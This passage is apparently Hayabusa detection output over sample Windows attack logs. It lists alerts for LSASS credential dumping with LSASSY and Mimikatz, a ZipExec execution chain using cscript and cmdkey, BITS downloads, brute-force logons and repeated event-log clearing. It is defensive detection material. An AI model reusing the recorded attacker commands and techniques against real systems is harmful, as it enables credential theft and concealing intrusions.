Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in 
ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx 
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 